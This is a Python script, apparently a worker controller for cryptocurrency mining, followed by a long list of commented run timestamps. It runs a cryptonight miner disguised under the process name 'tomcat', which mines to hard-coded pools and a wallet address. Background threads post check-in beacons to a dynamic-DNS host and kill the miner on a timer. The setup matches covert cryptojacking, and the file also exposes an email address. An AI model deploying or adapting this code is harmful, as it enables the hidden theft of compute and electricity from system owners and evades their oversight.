import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:07.395282
#2018-02-17 17:12:05.714840
#2018-02-17 19:00:01.520049
#2018-02-17 20:49:05.066046
#2018-02-17 22:36:06.948866
#2018-02-18 00:20:01.519519
#2018-02-18 02:11:05.470492
#2018-02-18 03:58:01.540854
#2018-02-18 05:46:06.656107
#2018-02-18 07:38:07.253504
#2018-02-18 09:25:01.375671
#2018-02-18 11:10:08.130408
#2018-02-18 12:57:04.897016
#2018-02-18 14:44:07.806982
#2018-02-18 16:32:06.507911
#2018-02-18 18:21:01.624205
#2018-02-18 20:06:05.360778
#2018-02-18 21:53:04.984449
#2018-02-18 23:43:01.887230
#2018-02-19 01:29:05.748206
#2018-02-19 03:17:06.039727
#2018-02-19 05:02:01.996562
#2018-02-19 06:46:07.142948
#2018-02-19 08:35:01.415249
#2018-02-19 10:23:07.892117
#2018-02-19 12:11:01.965245
#2018-02-19 13:57:08.845197
#2018-02-19 15:46:10.367715
#2018-02-19 17:35:06.826451
#2018-02-19 19:22:06.947054
#2018-02-19 21:10:08.216261
#2018-02-19 22:56:07.098844
#2018-02-20 00:40:08.407250
#2018-02-20 02:29:01.983315
#2018-02-20 04:19:07.279796
#2018-02-20 06:03:04.098205
#2018-02-20 07:48:03.935206
#2018-02-20 09:33:03.643481
#2018-02-20 11:17:08.850169
#2018-02-20 13:04:06.647754
#2018-02-20 14:48:05.417419
#2018-02-20 16:35:09.125149
#2018-02-20 18:21:06.411861
#2018-02-20 20:14:06.867365
#2018-02-20 22:00:12.484810
#2018-02-20 23:41:05.708541
#2018-02-21 01:27:01.289237
#2018-02-21 03:16:01.636366
#2018-02-21 05:03:06.752771
#2018-02-21 06:50:04.215972
#2018-02-21 08:36:04.107468
#2018-02-21 10:21:08.623567
#2018-02-21 12:08:08.645261
#2018-02-21 13:57:09.261985
#2018-02-21 15:41:10.248171
#2018-02-21 17:32:04.119629
#2018-02-21 19:19:13.300939
#2018-02-21 21:07:08.451072
#2018-02-21 22:53:07.454078
#2018-02-22 00:41:01.275546
#2018-02-22 02:27:06.319032
#2018-02-22 04:14:03.879911
#2018-02-22 05:59:01.371997
#2018-02-22 07:45:09.527404
#2018-02-22 09:34:01.518347
#2018-02-22 11:18:07.378865
#2018-02-22 13:03:08.563850
#2018-02-22 14:52:06.595222
#2018-02-22 16:37:09.438187
#2018-02-22 18:24:10.986965
#2018-02-22 20:17:01.697807
#2018-02-22 22:03:05.322188
#2018-02-22 23:49:08.384773
#2018-02-23 01:38:01.607977
#2018-02-23 03:24:01.940788
#2018-02-23 05:09:05.392368
#2018-02-23 06:54:07.929627
#2018-02-23 08:45:06.512988
#2018-02-23 11:09:08.772831
#2018-02-23 13:03:01.710158
#2018-02-23 14:49:10.621129
#2018-02-23 16:37:06.132661
#2018-02-23 18:23:02.088314
#2018-02-23 20:07:01.408464
#2018-02-23 21:54:06.861899
#2018-02-23 23:57:05.453363
#2018-02-24 01:48:05.162205
#2018-02-24 03:34:08.379500
#2018-02-24 05:18:05.118065
#2018-02-24 07:06:07.610816
#2018-02-24 08:54:04.457241
#2018-02-24 10:54:03.385417
#2018-02-24 12:42:07.047306
#2018-02-24 14:31:05.268732
#2018-02-24 16:18:06.849194
#2018-02-24 18:12:01.868546
#2018-02-24 19:58:04.543167
#2018-02-24 21:42:01.801353
#2018-02-25 00:36:03.621582
#2018-02-25 04:07:07.105724
#2018-02-25 07:38:05.264781